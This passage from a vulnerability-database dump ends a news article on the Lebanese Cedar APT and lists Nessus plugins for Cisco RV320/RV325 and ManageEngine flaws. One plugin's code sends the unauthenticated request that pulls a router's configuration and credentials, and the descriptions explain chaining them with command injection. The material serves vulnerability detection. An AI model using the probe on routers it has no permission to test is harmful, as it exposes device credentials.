shell, namely Caterpillar \u2013 a variant of the open-source web shell \u2018ASPXspy,'\u201d ClearSky\u2019s report said. \u201cBy using web shell, the attackers leave their fingerprint on the web server and the internal network, move laterally and deploy additional tools.\u201d\n\nCaterpillar sets out to scout out potentially valuable data, install server configuration files, and even access passwords and usernames, the report added.\n\nThe group uses the web shell to exfiltrate data to the C2 server through VPN services NordVPN or ExpressVPN, the report explained, then installs the file browser.\n\nLebanese Cedar\u2019s use of its signature Explosive RAT is being overtaken by the use of web shells, ClearSky observed.\n\n\u201cThe TTP [tactic, technique and procedure] itself was changed,\u201d ClearSky explains. \u201cIn 2015, Lebanese Cedar relied mostly on Explosive RAT as their main tool. In the recent campaign, we identified multiple Caterpillar web shells and less utilization of Explosive RAT (based on our scans). Accordingly, we propose that the main vector of Lebanese Cedar in 2020 is utilization of web shell.\u201d\n\n## **Nation-State Actor, Lebanese Cedar**\n\nLebanese Cedar, also known as \u201cVolatile Cedar,\u201d dates back to 2012 and has links to Hezbollah\u2019s cyber-unit, according to Check Point, which added the group chooses targets based on politics and ideology. Hezbollah is both a political party and a militant group based in Lebanon.\n\nIn 2015, Check Point researchers also tied the [APT group to the Lebanese government](<https://threatpost.com/volatile-cedar-apt-group-first-operating-out-of-lebanon/111895/>).\n\n\u201cKnown for its highly evasive, selectively targeted and carefully managed operations, Lebanese Cedar follows courses of action associated with APTs funded by nation-states or political groups,\u201d the report added.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/02/01161657/lebanese-cedar-timeline-300x95.png)\n\nA timeline of Lebanese Cedar activity (click to enlarge). Source: ClearSky.\n\nVictims have in the past primarily been in the telecom and IT sectors across the globe, including Egypt, Israel, Jordan, the Palestinian Authority, the U.K. and the U.S.\n\n\u201cLebanese Cedar APT\u2019s arsenal consists of a fully fledged web shell, a custom-developed RAT and a set of carefully selected complementary tools, including URI brute-force tools,\u201d CheckPoint reported. \u201cThe group uses open-source tools alongside their own custom tools, including custom web shell, most likely created by Iranian hacktivist groups such as \u2018ITSecTeam\u2019 and \u2018Persian Hacker.'\u201d\n\nIvan Righi, threat intelligence analyst with Digital Shadows, told Threatpost that he thinks the APT \u201clikely conducted this campaign to support Hezbollah\u2019s motives to obtain sensitive information.\u201d\n\n## **Patching, People! **\n\nSince the group uses exploits for vulnerabilities to gain initial access to targets, patching, is the best, first defense against these kinds of attacks.\n\n\u201cThat 250 systems have been compromised already documents the importance of patching these solutions, especially when used in the context of cooperation between parties, businesses and government agencies,\u201d Dirk Schrader, global vice president at New Net Technologies, explained to Threatpost. \u201cAs always, the best protection is to establish a good cyber-hygiene, scan for vulnerabilities, patch where possible, and control any changes happening to the infrastructure in between scans.\u201d\n\nTal Morgenstern from Vulcan Cyber agreed basic security hygiene is still the best line of defense for organizations. Attackers are out on the prowl for the holes they know already exist, he explained.\n\n\u201cThreat actors continue to utilize known vulnerabilities for their gain. In this case, vulnerable public websites are used to distribute malware, making unsuspecting visitors victims using something that could be fixed with a patch or configuration change.\u201d\n\n## **A Plea for InfoSec Collaboration **\n\nMore generally, the best bet against Lebanese Cedar and other similar threat actors is a tighter collaboration between vendors, researchers, industry groups and law enforcement, Derek Manky with Fortinet\u2019s FortiGuard Labs told Threatpost.\n\n\u201cFor example, many security organizations provide adversarial threat playbooks that can provide up-to-date analysis and insight on the latest APT groups and malware campaigns to date, with the goal of providing first responders, network defenders and anyone interested with actionable information,\u201d Manky said by email. \u201cAlso, organizations will need to know who to inform in the case of an attack so that the \u2018fingerprints\u2019 can be properly shared and law enforcement can do its work.\u201d\n\nBeyond basic inter-disciplinary cooperation, Manky said it\u2019s going to be increasingly important for the security community to start working together as a unified global front.\n\n\u201cCybercriminals face no borders online, so the fight against cybercrime needs to go beyond borders as well,\u201d Manky added. \u201cOnly by working together will we turn the tide against cybercriminals.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "cvss3": {}, "published": "2021-02-01T21:18:09", "type": "threatpost", "title": "Hezbollah-Linked Lebanese Cedar APT Infiltrates Hundreds of Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-3152", "CVE-2019-11581", "CVE-2019-3396"], "modified": "2021-02-01T21:18:09", "id": "THREATPOST:145B6B682222579D2623C124AE9DACD5", "href": "https://threatpost.com/hezbollah-lebanese-cedar-apt-servers/163555/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2022-06-16T16:21:15", "description": "According to its self-reported version, this Cisco Small Business RV Series router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. (CVE-2019-1652)\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-04-15T00:00:00", "type": "nessus", "title": "Cisco Small Business RV320 and RV325 Routers Multiple Vulnerabilities (cisco-sa-20190123-rv-inject, cisco-sa-20190123-rv-info)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2022-05-20T00:00:00", "cpe": ["x-cpe:/o:cisco:small_business_rv_series_router_firmware"], "id": "CISCO-SA-20190123-RV-INJECT.NASL", "href": "https://www.tenable.com/plugins/nessus/124060", "sourceData": "#TRUSTED 4c7e45e2a78c740e7049b2eab8159c295b37e8401f260d11529305c47ce7747af78b8968e6f770e4d6c23709f58011d04ae9234ca788228a174ad16e53ef2c56e3e8ca266f98a96abfc38e94cf35cb991ee3cfd8b2e6c03b9ef52ed8b828eeba6c89230449b29e02f3a802603326a41782f3f5b4ac3e16cd75e1082cce0d93845f449b1b07aa8a658880203c7dc6d95e3fe714e0f1226219a008e5e2edd0e3a0d5c9a376f598ba905c9e44a68ede8a0331b92cd2a40cd101ff5e0e3197584d096c53e256efe9f9d7477af39a7d7ba48addd0848088b1163c39009a61f4a4a12f13c1855d6395e2c3644ae4e80847d1d41fba0c99ebe2b21880f21ce7fa40dc479382114ec2e6fccde7817d27b435417c10671c0837907eb36145e3efa053c7c7ecaa9e3443117f9593ca4a4cf399353941d4aa2847199efa3901301e6266c49fe28adcfcd049215d9f8ce9aeeba5b1d2685f7dd54b5ccf37c18ba4c34f53bfb7d1cf579347644fdba69cf21bd5a52bdec63b202c446cd53307a7ad3fb06c686321fdcaf8bf99871b89b0df813b7a1030a80f416085d1e261f8753419cf5e57de71ac76983265a672055f7747429aef3d4a66a3cd1d270d52ed6eef45a3f1811d84d4ff4ef620fb988f132a6ea6cd0fa387e7d8695532c807c5bc5ca5751a40f15b0b151068e62f6720a80b3e7baa5291d831fe5e8a260609f0612d318171cfd8\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124060);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/20\");\n\n script_cve_id(\"CVE-2019-1652\", \"CVE-2019-1653\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvm78058\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvg85922\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-inject\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-info\");\n script_xref(name:\"IAVA\", value:\"2019-A-0356\");\n script_xref(name:\"IAVA\", value:\"0001-A-0008-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0009-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/17\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Cisco Small Business RV320 and RV325 Routers Multiple Vulnerabilities (cisco-sa-20190123-rv-inject, cisco-sa-20190123-rv-info)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, this Cisco Small Business RV\nSeries router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of\n Cisco Small Business RV320 and RV325 Dual Gigabit WAN\n VPN Routers could allow an authenticated, remote\n attacker with administrative privileges on an affected\n device to execute arbitrary commands.The vulnerability\n is due to improper validation of user-supplied input. An\n attacker could exploit this vulnerability by sending\n malicious HTTP POST requests to the web-based management\n interface of an affected device. A successful exploit\n could allow the attacker to execute arbitrary commands\n on the underlying Linux shell as root. (CVE-2019-1652)\n\n - A vulnerability in the web-based management interface of\n Cisco Small Business RV320 and RV325 Dual Gigabit WAN\n VPN Routers could allow an unauthenticated, remote\n attacker to retrieve sensitive information.The\n vulnerability is due to improper access controls for\n URLs. An attacker could exploit this vulnerability by\n connecting to an affected device via HTTP or HTTPS and\n requesting specific URLs. A successful exploit could\n allow the attacker to download the router configuration\n or detailed diagnostic information. (CVE-2019-1653)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for\nmore information\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f54bf7af\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2764da3f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvm78058\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg85922\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvm78058 & CSCvg85922\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1652\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1653\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV320 and RV325 Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 284);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:cisco:small_business_rv_series_router_firmware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_small_business_detect.nasl\", \"cisco_rv_webui_detect.nbin\");\n script_require_keys(\"Cisco/Small_Business_Router/Version\", \"Cisco/Small_Business_Router/Model\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nproduct_info = cisco::get_product_info(name:'Cisco Small Business Series Router Firmware');\n\nvuln_list = [\n {'min_ver' : '1.4.2.15', 'fix_ver' : '1.4.2.22'}\n];\n\nreporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'fix' , '1.4.2.22',\n 'version' , product_info['version'],\n 'bug_id' , 'CSCvm78058 & CSCvg85922',\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n reporting:reporting,\n vuln_ranges:vuln_list,\n models:make_list('RV320', 'RV325')\n);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:13", "description": "According to its self-reported version, this Cisco Small Business RV320 router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. (CVE-2019-1652)\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Cisco RV325 < 1.4.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-16T00:00:00", "cpe": ["cpe:2.3:h:cisco:rv325:*:*:*:*:*:*:*:*"], "id": "700567.PRM", "href": "https://www.tenable.com/plugins/nnm/700567", "sourceData": "Binary data 700567.prm", "cvss": {"score": 9, "vector": "CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:27:12", "description": "According to its self-reported version, this Cisco Small Business RV320 router is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands.The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. (CVE-2019-1652)\n - A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. (CVE-2019-1653)", "cvss3": {"score": 7.2, "vector": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-16T00:00:00", "type": "nessus", "title": "Cisco RV320 < 1.4.2.22 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-16T00:00:00", "cpe": ["cpe:2.3:h:cisco:rv320:*:*:*:*:*:*:*:*"], "id": "700566.PRM", "href": "https://www.tenable.com/plugins/nnm/700566", "sourceData": "Binary data 700566.prm", "cvss": {"score": 9, "vector": "CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T15:08:10", "description": "The remote Cisco Small Business router is affected by a remote information disclosure vulnerability. A remote, unauthenticated attacker can exploit this, via a simple HTTP GET or POST request, to obtain the configuration of the router. This configuration includes device credentials in the form of a plaintext username and an MD5 hashed password that is trivial to crack.\n\nThese credentials could then be used to authenticate to the router and can be leveraged with a command injection vulnerability (CVE-2019-1652) to allow an attacker to execute arbitrary commands.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2019-01-25T00:00:00", "type": "nessus", "title": "Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability (cisco-sa-20190123-rv-info) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2022-02-25T00:00:00", "cpe": ["cpe:/h:cisco:rv320_dual_gigabit_wan_vpn_router", "cpe:/h:cisco:rv320_dual_gigabit_wan_wf_vpn_router", "cpe:/h:cisco:rv325_dual_gigabit_wan_vpn_router", "cpe:/h:cisco:rv325_dual_gigabit_wan_wf_vpn_router"], "id": "CISCO-SA-20190123-RV-INFO_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/121395", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121395);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/25\");\n\n script_cve_id(\"CVE-2019-1653\");\n script_bugtraq_id(106732);\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20190123-rv-info\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvg85922\");\n script_xref(name:\"IAVA\", value:\"2019-A-0356\");\n script_xref(name:\"IAVA\", value:\"0001-A-0009-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability (cisco-sa-20190123-rv-info) (remote check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Cisco Small Business router is affected by a remote\ninformation disclosure vulnerability. A remote, unauthenticated\nattacker can exploit this, via a simple HTTP GET or POST request, to\nobtain the configuration of the router. This configuration includes\ndevice credentials in the form of a plaintext username and an MD5\nhashed password that is trivial to crack.\n\nThese credentials could then be used to authenticate to the router\nand can be leveraged with a command injection vulnerability\n(CVE-2019-1652) to allow an attacker to execute arbitrary commands.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2764da3f\");\n # https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0f4af0a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2019/Mar/59\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/0x27/CiscoRV320Dump\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to Cisco bug ID CSCvg85922 for any available patches, or\ncontact the vendor for a fix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1653\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco RV320 and RV325 Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv320_dual_gigabit_wan_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv320_dual_gigabit_wan_wf_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv325_dual_gigabit_wan_vpn_router\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:cisco:rv325_dual_gigabit_wan_wf_vpn_router\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 443, 8000, 8007, 8081, 8443);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\napp = \"Cisco Small Business RV320 Series Router\";\n\nport = get_http_port(default:443);\n\n# sanity check this is likely to be RV320/RV325\nres = http_get_cache(item:'/', port:port, exit_on_fail:TRUE);\n\nif ('<form name=\"form_contents\" method=\"post\" action=\"/cgi-bin/userLogin.cgi\">' >!< res ||\n '<input type=\"hidden\" name=\"portalname\" value=\"CommonPortal\">' >!< res ||\n '<input type=\"hidden\" name=\"auth_key\"' >!< res)\n{\n audit(AUDIT_WEB_FILES_NOT, app, port);\n}\n\nitem = '/cgi-bin/config.exp';\nres = http_send_recv3(method:'GET', item:item, port:port);\n\nif (isnull(res) ||\n '####sysconfig####' >!< res[2] ||\n 'MODEL=' >!< res[2] ||\n 'PASSWD=' >!< res[2])\n{\n res = http_send_recv3(method:'POST', item:item, data:'submitbkconfig=0', port:port);\n if (isnull(res) ||\n '####sysconfig####' >!< res[2] ||\n 'MODEL=' >!< res[2] ||\n 'PASSWD=' >!< res[2])\n {\n audit(AUDIT_LISTEN_NOT_VULN, app, port);\n }\n else\n method = 'POST';\n}\nelse\n method = 'GET';\n\noutput = data_protection::sanitize_user_full_redaction(output:res[2]);\n\ntrailer = 'Which returns the following page via a ' + method + ' request:\\n\\n' + output;\nreport = get_vuln_report(items:item, port:port, trailer:trailer);\nsecurity_report_v4(severity:SECURITY_WARNING, port:port, extra:report);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-03T18:13:46", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479.\nIt is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-10T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution (direct check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "href": "https://www.tenable.com/plugins/nessus/135293", "sourceData": "Binary data manageengine_desktop_central_cve-2020-10189.nbin", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-12T14:54:00", "description": "The ManageEngine Desktop Central application running on the remote host is version 10 prior to build 100479. It is, therefore, affected by a remote code execution vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-19T00:00:00", "type": "nessus", "title": "ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2022-01-24T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central"], "id": "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "href": "https://www.tenable.com/plugins/nessus/134677", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134677);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2020-10189\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"ManageEngine Desktop Central 10 < Build 100479 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a Java-based web application that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The ManageEngine Desktop Central application running on the remote\nhost is version 10 prior to build 100479. It is, therefore, affected by\na remote code execution vulnerability.\");\n # https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b517c025\");\n # https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9944baef\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ManageEngine Desktop Central version 10 build 100479 or\nlater. Alternatively, apply the manual, vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-10189\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ManageEngine Desktop Central Java Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/19\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zohocorp:manageengine_desktop_central\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"manageengine_desktop_central_detect.nbin\");\n script_require_keys(\"installed_sw/ManageEngine Desktop Central\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8020, 8383, 8040);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n# Cannot know if manual workaround is in place.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"ManageEngine Desktop Central\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:8020);\n\ninstall = get_single_install(\n app_name : appname,\n port : port,\n exit_if_unknown_ver : TRUE\n);\n\ndir = install[\"path\"];\nversion = install[\"version\"];\nbuild = install[\"build\"];\nismsp = install[\"MSP\"];\nrep_version = version;\n\ninstall_url = build_url(port:port, qs:dir);\n\nif (ismsp) appname += \" MSP\";\n\nif (build == UNKNOWN_VER)\n exit(0, \"The build number of \"+appname+\" version \" +rep_version+ \" listening at \" +install_url+ \" could not be determined.\");\nelse\n rep_version += \" Build \" + build;\n\nbuild = int(build);\nif (version =~ \"^10(\\.|$)\" && build < 100479)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + rep_version +\n '\\n Fixed version : 10 Build 100479' +\n '\\n';\n security_report_v4(port:port, extra:report, 